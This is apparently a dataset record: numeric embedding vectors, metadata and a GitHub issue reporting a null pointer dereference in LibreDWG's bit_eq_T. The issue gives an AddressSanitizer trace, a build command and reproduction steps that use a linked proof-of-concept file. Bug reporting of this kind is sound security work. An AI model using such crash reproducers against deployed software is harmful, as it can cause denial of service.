0.00414439057931304, -0.009556649252772331, 0.003552596317604184, -0.009805825538933277, -0.0017478994559496641, 0.021487802267074585, -0.005716400686651468, 0.0017424029065296054, -0.012348891235888004, -0.006720434874296188, -0.002737276488915086, 0.020095346495509148, -0.008530628867447376, -0.003411518642678857, 0.012869230471551418, -0.003581911325454712, -0.014254357665777206, 0.0031623421236872673, 0.010355479083955288, -0.004587777890264988, 0.0048516117967665195, 0.012905873358249664, -0.01263471134006977, 0.016812080517411232, 0.023715734481811523, 0.007673168554902077, -0.00029658409766852856, 0.012590738944709301, 0.0011368674458935857, 0.01114698126912117, 0.009388088248670101, -0.0024972609244287014, 0.007467964198440313, 0.008340082131326199, -0.0003604813537094742, -0.00001643236100790091, -0.007592552341520786, 0.01050938293337822, 0.01760358177125454, 0.04133397340774536, -0.006518895272165537, 0.01596194878220558, -0.014415590092539787, -0.019362473860383034, 0.007995632477104664, 0.00624040374532342, -0.016724135726690292, -0.01717851683497429, -0.008853091858327389, -0.001116713508963585, -0.015229077078402042, -0.0006866093026474118, 0.007519265171140432, 0.007365362253040075, 0.019494391977787018, 0.006394307129085064, -0.025240106508135796, -0.0005693498533219099, -0.0027922417502850294, 0.008706517517566681, 0.002385498024523258, -0.027101602405309677, 0.0023726727813482285, 0.001316421083174646, 0.028420770540833473, 0.005991227459162474, -0.008413368836045265, 0.012693340890109539, 0.0029992780182510614, 0.009556649252772331, -0.019714253023266792, -0.005771365948021412, -0.01264936849474907, 0.00167186395265162, 0.00241298065520823, 0.00819350779056549, 0.00819350779056549, 0.010362808592617512, 0.01811659336090088, 0.01604989357292652, -0.015932634472846985, 0.004785653203725815, -0.004206684418022633, 0.002169300802052021, 0.015185104683041573, 0.004957878030836582, -0.004356923047453165, -0.014628122560679913, -0.015287707559764385, -0.020652329549193382, -0.017559610307216644, -0.006735092494636774, -0.02314409427344799, 0.002922326559200883, 0.00901432428508997, 0.04435340687632561, -0.00279773841612041, -0.014334973879158497, -0.0046427431516349316, 0.004558463115245104, -0.007577895186841488, -0.0044375392608344555, 0.023276010528206825, -0.002768423408269882, -0.007863715291023254, 0.005584483500570059, -0.010318836197257042, -0.009432060644030571, 0.019875485450029373, 0.012737313285470009, 0.0004749925865326077, -0.005276677664369345, 0.005426916293799877, 0.000270017480943352, 0.01777947135269642, 0.01481866929680109, 0.007317725569009781, 0.02006603218615055, -0.007680497132241726, 0.00202822289429605, -0.014166412875056267, -0.003803604980930686, -0.0010251045459881425, 0.014789354056119919, -0.01648961752653122, -0.009307472966611385, -0.0033052521757781506, 0.02707228623330593, 0.009593293070793152, -0.03127897158265114, 0.012143686413764954, 0.0017195006366819143, -0.006273383274674416, 0.010164933279156685, 0.0033712105359882116, -0.015448939055204391, 0.020285893231630325, 0.025166820734739304, 0.0162257831543684, -0.002108838874846697, 0.009717880748212337, 0.014745381660759449, 0.00824480876326561, -0.00820083636790514, -0.02459518052637577, -0.0234812144190073, 0.000027783287805505097, 0.006529888138175011, -0.01580071821808815, -0.011315541341900826, 0.0026731500402092934, -0.028244880959391594, 0.006386978551745415, -0.012876559048891068, 0.013133063912391663, 0.015023873187601566, -0.014210385270416737, 0.017911387607455254, 0.010846504010260105, 0.0048516117967665195, 0.00408209627494216, 0.013770662248134613, -0.009820482693612576, -0.01042143814265728, -0.012707998044788837, -0.01733974926173687, -0.0155955133959651, -0.004847947508096695, -0.014716067351400852, -0.009468704462051392, 0.03315512463450432, 0.013638745062053204, -0.021898211911320686, 0.00223342701792717, -0.03031158074736595, 0.008435355499386787, 0.003316245274618268, -0.0023213715758174658, -0.016592219471931458, -0.005042158532887697, -0.014972572214901447, -0.00738734845072031, 0.01733974926173687, 0.0008075332152657211, -0.010025687515735626, -0.02638338692486286, 0.005404930096119642, 0.015668800100684166, 0.019963430240750313, -0.014987229369580746, 0.0012183994986116886, 0.010450752452015877, -0.02178095281124115, -0.013418884016573429, -0.0132356658577919, 0.004694044124335051, 0.02194218337535858, -0.0010251045459881425, 0.013653403148055077, 0.00973253883421421, -0.0014620793517678976, 0.012847243808209896, 0.01499455887824297, -0.015126475133001804, 0.005690750200301409, 0.016255097463726997, -0.0016388847725465894, -0.01422504335641861, -0.028142279013991356, 0.0008185262558981776, -0.0003446787886787206, -0.015771402046084404, -0.00548921013250947, -0.0007942498777993023, 0.01673879288136959, 0.012070399709045887, -0.029007067903876305, -0.0069183106534183025, 0.005705407354980707, -0.004111411049962044, -0.006888995412737131, -0.0009073870023712516, 0.007849058136343956, 0.005448902491480112, -0.020036716014146805, -0.016694821417331696, 0.011484102346003056, 0.030458154156804085, -0.016416329890489578, -0.029930487275123596, 0.03784550353884697, 0.0046427431516349316, 0.016518931835889816, 0.008831106126308441, 0.0019127955893054605, 0.017105229198932648, 0.016196468845009804, -0.009344116784632206, 0.009270829148590565, -0.008413368836045265, -0.0026236812118440866, 0.003953843843191862, 0.012348891235888004, -0.005753044039011002, -0.013316282071173191, -0.016299070790410042, 0.0038878852501511574, -0.005731057841330767, -0.02613421157002449, 0.0029278232250362635, -0.02066698670387268, -0.018424399197101593, -0.013550801202654839, 0.024302031844854355, 0.00900699570775032, 0.00743132084608078, 0.025914348661899567, -0.023920938372612, 0.005851981695741415, 0.006496909074485302, 0.007724469527602196, 0.012312247417867184, 0.0035031274892389774, 0.008090905845165253, 0.0014318483881652355, 0.006537217181175947, -0.0023341968189924955, 0.003204482141882181, -0.005525853950530291, 0.005969241261482239, -0.0028618646319955587, -0.014159084297716618, 0.006914645899087191, 0.005928933620452881, -0.004598770756274462, 0.0018633267609402537, 0.003957508131861687, 0.009498019702732563, 0.0023067141883075237, -0.008274123072624207, -0.011865195818245411, -0.019714253023266792, 0.01937713287770748, 0.010040344670414925, -0.01486264169216156, -0.034122515469789505, 0.0040198019705712795, 0.013939223252236843, 0.01414442714303732, 0.015360994264483452, 0.012231631204485893, -0.01410045474767685, -0.020696301013231277, -0.0071968017145991325, -0.015287707559764385, -0.003072565421462059, -0.006676462944597006, 0.008281451649963856, -0.0036771846935153008, 0.003446329850703478, 0.0077391271479427814, -0.002663989318534732, -0.011029721237719059, 0.003708331612870097, 0.01939179003238678, 0.022235332056879997, -0.02289491705596447, -0.01340422686189413, 0.018864121288061142, 0.014247029088437557, 0.007673168554902077, -0.013690046966075897, 0.029021725058555603, 0.010699929669499397, -0.010641299188137054, 0.012019098736345768, -0.026075581088662148, 0.012737313285470009, 0.003257615491747856, 0.011667320504784584, 0.003942850511521101, -0.007284746505320072, 0.009754524566233158, 0.008252137340605259, -0.01025287713855505, -0.0022957210894674063, -0.006980604492127895, 0.0007827987428754568, -0.010890476405620575, 0.024199429899454117, -0.00880179088562727, 0.018673574551939964, 0.004675722680985928, 0.008186179213225842, 0.0033785393461585045, 0.00871384609490633, -0.0008286032825708389, 0.009190212935209274, -0.007053891662508249, 0.007563237566500902, 0.00670577771961689, 0.006852352060377598, -0.004855276085436344, -0.00008731480920687318, 0.001295351074077189, 0.02682311087846756, 0.009820482693612576, 0.006878002546727657, 0.004338601604104042, -0.019582336768507957, -0.012495465576648712, -0.013096420094370842, -0.004584113601595163, -0.011249583214521408, -0.015023873187601566, -0.0020465448033064604, 0.00561379874125123, -0.02236725017428398, -0.0018889772472903132, 0.02529873698949814, 0.005903282668441534, -0.022587111219763756, -0.005943590775132179, -0.0017735499422997236, -0.027790501713752747, 0.009146240539848804, 0.008831106126308441, 0.03025295026600361, 0.006390642840415239, 0.008574601262807846, 0.0032814338337630033, -0.008354739286005497, -0.0016984305111691356, -0.024199429899454117, 0.014767368324100971, -0.014547506347298622, 0.007805085275322199, 0.012414849363267422, 0.013396897353231907, -0.010714586824178696, 0.010765887796878815, -0.011418143287301064, -0.00014474219642579556, 0.0006151543348096311, -0.002337861340492964, -0.022411221638321877, 0.0044888402335345745, 0.010941777378320694, 0.00893370807170868, -0.004206684418022633, 0.013096420094370842, 0.028728576377034187, -0.01119095366448164, 0.002403819700703025, 0.02315875142812729, 0.023261353373527527, -0.022572454065084457, -0.01055335532873869, -0.0043532587587833405, 0.0007736378465779126, -0.010575341060757637, 0.011674649082124233, -0.002169300802052021, -0.017222488299012184, -0.018937408924102783, 0.0012147350935265422, 0.02179560996592045, 0.006533552892506123, -0.0016480456106364727, -0.0358520932495594, -0.0013640577672049403, 0.006071843206882477, 0.018351111561059952, 0.009395417757332325, 0.008537957444787025, -0.014569493010640144, -0.0035251136869192123, 0.013821963220834732, 0.00636499235406518, -0.0014034496853128076, 0.005492874421179295, 0.009981715120375156, -0.0234812144190073, -0.026852425187826157, -0.00018401954730506986, -0.026632564142346382, 0.008911722339689732, 0.01412976998835802, -0.006474922876805067, 0.002161971991881728, 0.007761112879961729, 0.005448902491480112, 0.015771402046084404, -0.02032986655831337, -0.024727096781134605, 0.019699595868587494, -0.0028325498569756746, -0.012209645472466946, 0.0037706256844103336, 0.007812414318323135, -0.002819724613800645, 0.016255097463726997, 0.007464299909770489, 0.02587037719786167, 0.012077728286385536, -0.020725617185235023, 0.001190916751511395, 0.018160564824938774, 0.011887181550264359, 0.008955693803727627, -0.012883887626230717, 0.02178095281124115, 0.0062623899430036545, -0.005089795216917992, -0.015580856241285801, -0.0027995705604553223, 0.0012477143900468946, 0.022704370319843292, -0.020285893231630325, 0.005665099713951349, 0.0030304251704365015, -0.00770981190726161, -0.011975126340985298, 0.03602798283100128, 0.0015573527198284864, 0.0050604804418981075, 0.005034829955548048, 0.005393936764448881, -0.010311507619917393, -0.015155790373682976, -0.02512284740805626, -0.007607209961861372, 0.006181774195283651, 0.006566531956195831, 0.00510445237159729, 0.016797423362731934, 0.034034568816423416, 0.021297257393598557, -0.002693304093554616, -0.007570566609501839, 0.0427117720246315, 0.025782432407140732, -0.004547469783574343, 0.011220267973840237, -0.013345596380531788, -0.02459518052637577, 0.008186179213225842, 0.01838042587041855, 0.010589998215436935, -0.000028957027097931132, 0.016709478572010994, -0.003891549538820982, 0.001723164925351739, 0.01174060720950365, -0.005247362423688173, 0.0054452382028102875, 0.004814967978745699, -0.0024844356812536716, 0.010450752452015877, 0.0059106117114424706, 0.003072565421462059, 0.0028820186853408813, 0.014254357665777206, 0.021678349003195763, -0.005939926486462355, -0.02307080663740635, -0.0222206749022007, 0.022499166429042816, 0.018937408924102783, -0.03740578144788742, 0.006408964283764362, 0.018820149824023247, -0.019069325178861618, -0.012766627594828606, 0.004796646535396576, -0.018776176497340202, -0.013712032698094845, -0.02597297914326191, 0.010216234251856804, -0.0036735201720148325, 0.01870289072394371, -0.01400518137961626, 0.004411888774484396, 0.007116185966879129, -0.0192159004509449, -0.007020912598818541, 0.017955360934138298, -0.002079523866996169, 0.0032594476360827684, -0.028904465958476067, -0.013895250856876373, -0.03350690007209778, 0.021678349003195763, -0.006943961139768362, 0.0022773994132876396, -0.017354406416416168, 0.0022700706031173468, -0.018864121288061142, -0.003358385292813182, -0.016123181208968163, 0.0008602083544246852, -0.0062440684996545315, 0.0027555981650948524, -0.03646770492196083, 0.006148795131593943, 0.020461782813072205, 0.006068178918212652, 0.011315541341900826, -0.006123144645243883, -0.004382573999464512, -0.021311914548277855, -0.026427360251545906, 0.005840988829731941, 0.001486813765950501, -0.012319575995206833, -0.0162404403090477, 0.0070465630851686, -0.003589239902794361, 0.011124994605779648, -0.017031941562891006, 0.006375985220074654, 0.013506828807294369, -0.004770996049046516, -0.004137061536312103, -0.002995613729581237, 0.0077171409502625465, 0.007907687686383724, 0.016636190935969353, -0.0011799236526712775, -0.004122404381632805, -0.00257421238347888, -0.004316615406423807, -0.010611984878778458, -0.013814634643495083, -0.0072187879122793674, 0.0066068400628864765, -0.013221008703112602, -0.005459895357489586, -0.00035177849349565804, 0.011242254637181759, -0.006328348536044359, 0.019201243296265602, 0.032422251999378204, 0.0027281155344098806, 0.001162518048658967, -0.0020483769476413727, -0.017031941562891006, 0.013089091517031193, -0.009065625257790089, -0.019846169278025627, -0.009710552170872688, -0.011300884187221527, 0.03743509575724602, -0.002827053191140294, -0.006819372531026602, -0.018776176497340202, -0.01947973482310772, 0.01264936849474907, 0.0023488544393330812, -0.027277490124106407, 0.011982454918324947, 0.020520411431789398, -0.01914261281490326, 0.008340082131326199, 0.00700259068980813, 0.021927526220679283, -0.01191649679094553, -0.0015665136743336916, 0.008010289631783962, 0.005712736397981644, 0.003184328321367502, 0.015097160823643208, 0.014312987215816975, -0.001442841487005353, -0.015199762769043446, -0.007841728627681732, 0.008391383104026318, -0.0018999703461304307, -0.005419587250798941, -0.012297590263187885, -0.030604729428887367, -0.016856053844094276, -0.018175221979618073, -0.010546025820076466, -0.006507902406156063, 0.017119886353611946, -0.013675388880074024, -0.0040417881682515144, -0.009725209325551987, -0.012524779886007309, 0.00602420698851347, 0.02740940824151039, -0.007533922791481018, -0.0012614557053893805, -0.003123866394162178, 0.0013109245337545872, -0.007599881384521723, 0.04892652481794357, 0.01332361064851284, 0.0003529236128088087, 0.012656697072088718, -0.003431672463193536, 0.005155753809958696, 0.0034078541211783886, -0.0020465448033064604, -0.007229780778288841, -0.0008899812819436193, -0.017823444679379463, -0.008252137340605259, 0.0011212939862161875, -0.000681112811435014, -0.010648628696799278, 0.001168930670246482, 0.007951660081744194, -0.0016517100157216191, -0.009219528175890446, -0.018996039405465126, 0.009116926230490208, 0.010802531614899635, 0.015917977318167686, -0.014312987215816975, -0.007497279439121485, 0.00900699570775032, 0.009065625257790089, -0.035148534923791885, -0.006760742980986834, 0.0016590387094765902, 0.015874003991484642, -0.018145907670259476, -0.015874003991484642, -0.01843905635178089, 0.017383720725774765, -0.010831845924258232, -0.001962264534085989, 0.01802864857017994, -0.021385200321674347, -0.01777947135269642, -0.015185104683041573, 0.0007672252249903977, 0.008545286022126675, 0.0030670687556266785, -0.03289128839969635, 0.018483027815818787, -0.026603247970342636, 0.038578376173973083, 0.02236725017428398, 0.015111817978322506, -0.0020905169658362865, 0.01776481419801712, 0.0016489616828039289, 0.007185808848589659, 0.005181404296308756, -0.006445608101785183, 0.01615249551832676, -0.007101528346538544, -0.0205057542771101, -0.006456600967794657, 0.006053521763533354, 0.00514842476695776, -0.01682673767209053, -0.011865195818245411, -0.018497686833143234, -0.003774290205910802, 0.017281118780374527, -0.00399415148422122, -0.008691860362887383, 0.029593365266919136, -0.009600621648132801, -0.011308212764561176, -0.00602420698851347, -0.011894510127604008, -0.01315504964441061, -0.030780619010329247, -0.005851981695741415, -0.009629935957491398, 0.008581929840147495, -0.00368451327085495, -0.024140799418091774, -0.027819816023111343, -0.008706517517566681, 0.003013935638591647, 0.015141133219003677, 0.0016095698811113834, 0.000910593313165009, -0.010274863801896572, 0.006343006156384945, -0.000925250758882612, 0.03655564785003662, 0.005309656728059053, -0.008552614599466324, -0.02006603218615055, 0.021311914548277855, -0.004939556587487459, 0.012590738944709301, 0.011550060473382473, -0.0033418957609683275, 0.0008941036649048328, 0.008772476576268673, -0.011447458527982235, -0.023305324837565422, -0.008809119462966919, 0.002405651845037937, -0.025005588307976723, 0.02682311087846756, -0.00891905091702938, -0.00806891918182373, 0.006837694440037012, 0.016856053844094276, -0.003979494329541922, -0.020300550386309624, 0.0040014805272221565, 0.007453307043761015, -0.0017030109884217381, 0.014496205374598503, -0.012173001654446125, -0.00018550819368101656, 0.011132324114441872, -0.009212199598550797, 0.0030157677829265594, 0.016211125999689102, -0.006104822736233473, -0.028068993240594864, -0.006101158447563648, 0.016167152673006058, 0.025386681780219078, 0.031161712482571602, -0.026896396651864052, -0.006716770585626364, 0.004972535651177168, 0.017413035035133362, 0.017295775935053825, 0.024902986362576485, -0.007292075082659721, -0.011286227032542229, 0.019098641350865364, 0.008596586994826794, 0.0030579078011214733, 0.012312247417867184, 0.0384611152112484, 0.005606469698250294, 0.005727393552660942, -0.012524779886007309, 0.012854572385549545, -0.00028009447851218283, -0.006570196244865656, -0.007783099077641964, -0.005294999107718468, 0.005434244871139526, 0.003581911325454712, 0.002737276488915086, -0.011168967001140118, 0.013975866138935089, 0.022836286574602127, 0.009021652862429619, 0.011476773768663406, -0.01989014260470867, 0.004382573999464512, -0.0062110889703035355, 0.02707228623330593, -0.0053902724757790565, -0.029857199639081955, -0.014672094956040382, -0.0014245196944102645, 0.009776510298252106, -0.0020813560113310814, 0.019435761496424675, 0.002856368198990822, -0.03289128839969635, -0.010062330402433872, 0.0030066068284213543, -0.0036497018299996853, 0.01690002530813217, -0.0034591553267091513, 0.01319902203977108, 0.010677943006157875, 0.014833326451480389, 0.006009549368172884, 0.008186179213225842, 0.018732205033302307, -0.020359180867671967, 0.004239663947373629, -0.00522904098033905, -0.008611244149506092, 0.003046914702281356, -0.009820482693612576, 0.008171521127223969, 0.0015564366476610303, 0.015097160823643208, -0.016343042254447937, 0.012173001654446125, 0.011388828977942467, -0.003501295344904065, 0.032686084508895874, -0.005606469698250294, 0.0051337676122784615, 0.011388828977942467, -0.007277417462319136, 0.017457008361816406, -0.0009215863537974656, 0.006207424681633711, 0.004246992524713278 ]
166
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
## Affected version the latest commit: https://github.com/LibreDWG/libredwg/tree/45d2a290c65ed691be0901ba2b2ef51044e07a16 and 0.12.4 ## What's the problem? A null pointer deference was discovered in function bit_eq_T in bits.c. ASAN report: ``` ==3404==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000042e870 bp 0x7fffffffc8e0 sp 0x7fffffffc080 T0) ==3404==The signal is caused by a READ memory access. ==3404==Hint: address points to the zero page. #0 0x42e870 in strcmp /src/llvm-project-12.0.0.src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:444:25 #1 0x4e453e in bit_eq_T /src/libredwg/src/bits.c:2643:13 #2 0xe3a82a in dxf_has_STYLE_eed /src/libredwg/src/out_dxf.c:1382:15 #3 0xe812b2 in dwg_dxf_STYLE_private /src/libredwg/src/./dwg.spec:3087:39 #4 0xe6fd1c in dwg_dxf_STYLE /src/libredwg/src/./dwg.spec:3045:1 #5 0xe64169 in dxf_tables_write /src/libredwg/src/out_dxf.c:3178:26 #6 0xe41b24 in dwg_write_dxf /src/libredwg/src/out_dxf.c:3675:11 #7 0x4c864b in main /src/libredwg/programs/dxfwrite.c:451:11 #8 0x7ffff6ee383f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 #9 0x41bc98 in _start (/mnt/disk/out/libredwg/programs_asan/dxfwrite+0x41bc98) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /src/llvm-project-12.0.0.src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:444:25 in strcmp ==3404==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64252.zip dxfwrite -I DWG -o /dev/null -y ./tests_64252 ``` POC file : [tests_64252.zip](https://github.com/LibreDWG/libredwg/files/6635494/tests_64252.zip)
Null pointer dereference in function bit_eq_T in bits.c
https://api.github.com/repos/LibreDWG/libredwg/issues/371/comments
0
2021-06-11T02:59:33
2022-02-05T13:21:00Z
https://github.com/LibreDWG/libredwg/issues/371
918,156,392
371
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Null pointer dereference in function bit_eq_T in bits.c Issue date: --- start body --- ## Affected version the latest commit: https://github.com/LibreDWG/libredwg/tree/45d2a290c65ed691be0901ba2b2ef51044e07a16 and 0.12.4 ## What's the problem? A null pointer deference was discovered in function bit_eq_T in bits.c. ASAN report: ``` ==3404==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000042e870 bp 0x7fffffffc8e0 sp 0x7fffffffc080 T0) ==3404==The signal is caused by a READ memory access. ==3404==Hint: address points to the zero page. #0 0x42e870 in strcmp /src/llvm-project-12.0.0.src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:444:25 #1 0x4e453e in bit_eq_T /src/libredwg/src/bits.c:2643:13 #2 0xe3a82a in dxf_has_STYLE_eed /src/libredwg/src/out_dxf.c:1382:15 #3 0xe812b2 in dwg_dxf_STYLE_private /src/libredwg/src/./dwg.spec:3087:39 #4 0xe6fd1c in dwg_dxf_STYLE /src/libredwg/src/./dwg.spec:3045:1 #5 0xe64169 in dxf_tables_write /src/libredwg/src/out_dxf.c:3178:26 #6 0xe41b24 in dwg_write_dxf /src/libredwg/src/out_dxf.c:3675:11 #7 0x4c864b in main /src/libredwg/programs/dxfwrite.c:451:11 #8 0x7ffff6ee383f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 #9 0x41bc98 in _start (/mnt/disk/out/libredwg/programs_asan/dxfwrite+0x41bc98) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /src/llvm-project-12.0.0.src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:444:25 in strcmp ==3404==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64252.zip dxfwrite -I DWG -o /dev/null -y ./tests_64252 ``` POC file : [tests_64252.zip](https://github.com/LibreDWG/libredwg/files/6635494/tests_64252.zip) --- end body ---
2,070
[ -0.02472888119518757, 0.014642477966845036, 0.004047456197440624, -0.00034452625550329685, 0.051263000816106796, 0.03977252170443535, 0.011003348976373672, 0.042408742010593414, 0.02644815482199192, -0.0048175472766160965, -0.03710765019059181, -0.006529656704515219, -0.00559122022241354, 0.004753074608743191, -0.006558311637490988, 0.02488648146390915, -0.03008728288114071, 0.018854698166251183, -0.016805896535515785, -0.008080584928393364, 0.030259210616350174, -0.015559423714876175, -0.00967091228812933, 0.04195027053356171, -0.012679641135036945, 0.009155130945146084, -0.016619641333818436, 0.007801202591508627, -0.004376983270049095, -0.003986564930528402, -0.0058312020264565945, 0.019614042714238167, 0.00671232957392931, 0.0009035139810293913, 0.04576132446527481, -0.008166548795998096, 0.054586928337812424, 0.03822517767548561, 0.005727329291403294, 0.03965790569782257, -0.015473459847271442, -0.06005994975566864, -0.018482187762856483, -0.003076782915741205, -0.01187014952301979, 0.017737170681357384, 0.02111840806901455, 0.00995029415935278, -0.0339556485414505, 0.0016118187922984362, 0.008402948267757893, -0.011325713247060776, 0.001205282285809517, -0.04931449145078659, 0.027336446568369865, -0.011361530981957912, 0.003696437692269683, 0.03137673810124397, -0.010974694974720478, 0.006769638974219561, -0.01570269651710987, 0.052380528301000595, 0.009943130426108837, 0.010494731366634369, 0.0091408034786582, 0.031978484243154526, -0.02159120701253414, -0.0037071830593049526, -0.03223637491464615, -0.010043421760201454, -0.025875063613057137, -0.009928803890943527, 0.00709558418020606, 0.047337327152490616, 0.02257978916168213, -0.04578997939825058, 0.01366105955094099, 0.021576879546046257, -0.01521556917577982, 0.00895454827696085, -0.019986553117632866, 0.02790953777730465, -0.018124006688594818, 0.016304442659020424, 0.0007177070947363973, 0.004907092545181513, -0.0016565915429964662, -0.07375682890415192, -0.021361971274018288, -0.019270189106464386, -0.02679201029241085, 0.007120657246559858, 0.006776802241802216, -0.01242891326546669, 0.024743208661675453, -0.02644815482199192, -0.02034473419189453, -0.00894022174179554, -0.03719361126422882, -0.00663352943956852, -0.033812373876571655, -0.005917165894061327, -0.001523168757557869, 0.04533150792121887, 0.03868364915251732, 0.007471675518900156, 0.019857607781887054, -0.006862766109406948, 0.009599275887012482, 0.1437312513589859, 0.00469576520845294, -0.008854257874190807, -0.04536016285419464, -0.0021938644349575043, -0.01437742356210947, 0.01732167974114418, 0.022508153691887856, -0.007031111512333155, -0.049887582659721375, -0.024026844650506973, -0.05286765471100807, -0.03143404796719551, -0.01928451657295227, -0.0033436284866183996, -0.006561893038451672, 0.033812373876571655, 0.002924555679783225, 0.0069451481103897095, -0.060919586569070816, -0.003947164863348007, -0.01594625972211361, -0.044901687651872635, 0.021046770736575127, 0.0008578457636758685, -0.005677183624356985, -0.006540402304381132, -0.033096011728048325, 0.03152001276612282, 0.015315859578549862, -0.002849337412044406, -0.08533326536417007, -0.021748807281255722, 0.005372729152441025, -0.004835456144064665, -0.010552040301263332, -0.002132973400875926, -0.00339556485414505, -0.004047456197440624, 0.005161401815712452, -0.009914476424455643, -0.01521556917577982, 0.015745678916573524, 0.03401295840740204, 0.0019520915811881423, 0.049515072256326675, 0.0066227843053638935, 0.0014255641726776958, 0.010817094705998898, -0.019986553117632866, -0.009678076021373272, 0.025688808411359787, -0.01641906052827835, 0.0007508388953283429, -0.04146314039826393, -0.050202783197164536, 0.02700691856443882, 0.014312950894236565, 0.03043113835155964, -0.021820444613695145, 0.028110118582844734, 0.009756876155734062, 0.0035818193573504686, 0.004083274397999048, 0.002822473645210266, -0.06120613217353821, -0.0034725740551948547, -0.02212131768465042, 0.011232585646212101, -0.008718148805201054, -0.020731570199131966, -0.00276874634437263, -0.0059386566281318665, -0.03212175518274307, 0.002980073681101203, 0.03401295840740204, -0.022407863289117813, 0.03584684804081917, -0.02124735340476036, -0.02061695232987404, 0.0033615375868976116, -0.009570621885359287, -0.009456003084778786, -0.004262364935129881, -0.0051506562158465385, 0.025158699601888657, 0.005071856547147036, -0.04183565080165863, -0.023066917434334755, 0.006604874972254038, -0.012414585798978806, 0.00891156680881977, 0.04768117889761925, -0.00653323857113719, 0.028396664187312126, -0.022035352885723114, 0.018525170162320137, -0.024413680657744408, 0.045961905270814896, 0.01062367670238018, -0.02482917159795761, -0.012765604071319103, -0.023152880370616913, 0.017207060009241104, 0.007246020715683699, -0.011920294724404812, 0.01859680563211441, -0.0036391285248100758, -0.01199193112552166, -0.007296166382730007, 0.00037183763924986124, 0.023840589448809624, -0.007224529981613159, 0.003825383260846138, 0.0036749467253684998, -0.043812815099954605, 0.0010682776337489486, 0.018396224826574326, 0.009771203622221947, -0.020545316860079765, 0.0018356824293732643, 0.05183609202504158, -0.02541659027338028, 0.008259675465524197, 0.00786567572504282, 0.01090305857360363, -0.01082425843924284, 0.015401823446154594, -0.027422409504652023, -0.030545756220817566, -0.004606219939887524, -0.01107498537749052, 0.02336779050529003, -0.022937972098588943, -0.02379760891199112, 0.015688369050621986, 0.0192558616399765, -0.025373609736561775, -0.009685239754617214, 0.005308256484568119, 0.014542186632752419, -0.003646292258054018, -0.00014237732102628797, 0.011762695387005806, -0.0052222926169633865, 0.022164298221468925, -0.03258023038506508, 0.004505929071456194, 0.02806713804602623, -0.02769462764263153, -0.028898119926452637, 0.03249426558613777, -0.0051040928810834885, -0.04031695798039436, 0.02448531799018383, -0.009341385215520859, 0.003861201461404562, -0.0505179800093174, -0.0037036011926829815, -0.008266839198768139, -0.03000131994485855, 0.03286677598953247, -0.022608444094657898, -0.005562565755099058, -0.0429818332195282, -0.008947384543716908, 0.001294827787205577, -0.01334585901349783, -0.012844404205679893, -0.0074931662529706955, -0.007808366324752569, -0.011984768323600292, 0.02544524520635605, -0.03564626723527908, 0.008918730542063713, 0.03435681387782097, -0.016877533867955208, 0.009026184678077698, -0.005730911158025265, -0.01370404101908207, 0.0040976013988256454, 0.004685019608587027, 0.01843920722603798, -0.05461558327078819, 0.007880003191530704, -0.011590767651796341, 0.030517101287841797, 0.01663396880030632, -0.031319428235292435, -0.014943351037800312, -0.015845969319343567, 0.030287865549325943, -0.00947033055126667, 0.006440111435949802, 0.015459132380783558, -0.019771642982959747, 0.005168565548956394, 0.0042802742682397366, -0.01141884084790945, -0.02878350019454956, 0.00487485621124506, 0.04046023264527321, -0.04355492442846298, 0.010845749638974667, -0.007163638714700937, -0.0039543285965919495, -0.040259651839733124, -0.007822693325579166, -0.03510183095932007, 0.008073421195149422, 0.015172586776316166, -0.03690706938505173, -0.0011417049681767821, -0.02856859192252159, -0.0074215298518538475, 0.04899929091334343, -0.024241754785180092, -0.013188258744776249, 0.062008459120988846, -0.06086227670311928, 0.01962837018072605, 0.008431603200733662, -0.023124225437641144, -0.021519571542739868, -0.015444805845618248, -0.020459352061152458, -0.034872595220804214, -0.003177073784172535, 0.008976039476692677, 0.015272878110408783, -0.004065365064889193, -0.01217818632721901, 0.02700691856443882, 0.003209310118108988, -0.014800078235566616, 0.005236620083451271, 0.0025341373402625322, 0.01891200616955757, -0.005086183547973633, -0.0026630826760083437, 0.006458020303398371, 0.0008430707384832203, 0.055589836090803146, -0.011927458457648754, -0.0018132961122319102, -0.0038289648946374655, -0.009570621885359287, -0.0068090385757386684, -0.027952518314123154, 0.007643602788448334, -0.005387056618928909, 0.0332106314599514, -0.00750749371945858, 0.0020631279330700636, -0.003562119323760271, -0.00007773667311994359, 0.018840370699763298, 0.025058409199118614, -0.003135883016511798, -0.007693747989833355, -0.00794447585940361, -0.037336885929107666, 0.046993471682071686, -0.01703513413667679, -0.03513048589229584, -0.03329659253358841, 0.009047675877809525, 0.04831157997250557, 0.046305760741233826, -0.04028830677270889, 0.011411677114665508, -0.0014757096068933606, 0.0012249822029843926, -0.0012151323026046157, -0.03455739468336105, 0.034843940287828445, 0.0007759116124361753, -0.011676731519401073, 0.05157820135354996, -0.02578910067677498, -0.006364893168210983, -0.014771423302590847, 0.03429950401186943, -0.020702917128801346, -0.03833979368209839, 0.024026844650506973, 0.0516355074942112, 0.02376895397901535, 0.012887386605143547, 0.0365632139146328, -0.03641993924975395, 0.002625473542138934, -0.009943130426108837, -0.003750164993107319, -0.011805676855146885, 0.009921640157699585, 0.0065869661048054695, 0.007930148392915726, 0.0013136322377249599, 0.012493385933339596, -0.007400039117783308, 0.018496515229344368, -0.007765384390950203, -0.04137717932462692, -0.004935747012495995, 0.027064228430390358, 0.030946919694542885, -0.012887386605143547, -0.0021293917670845985, -0.05725180357694626, 0.02252248115837574, 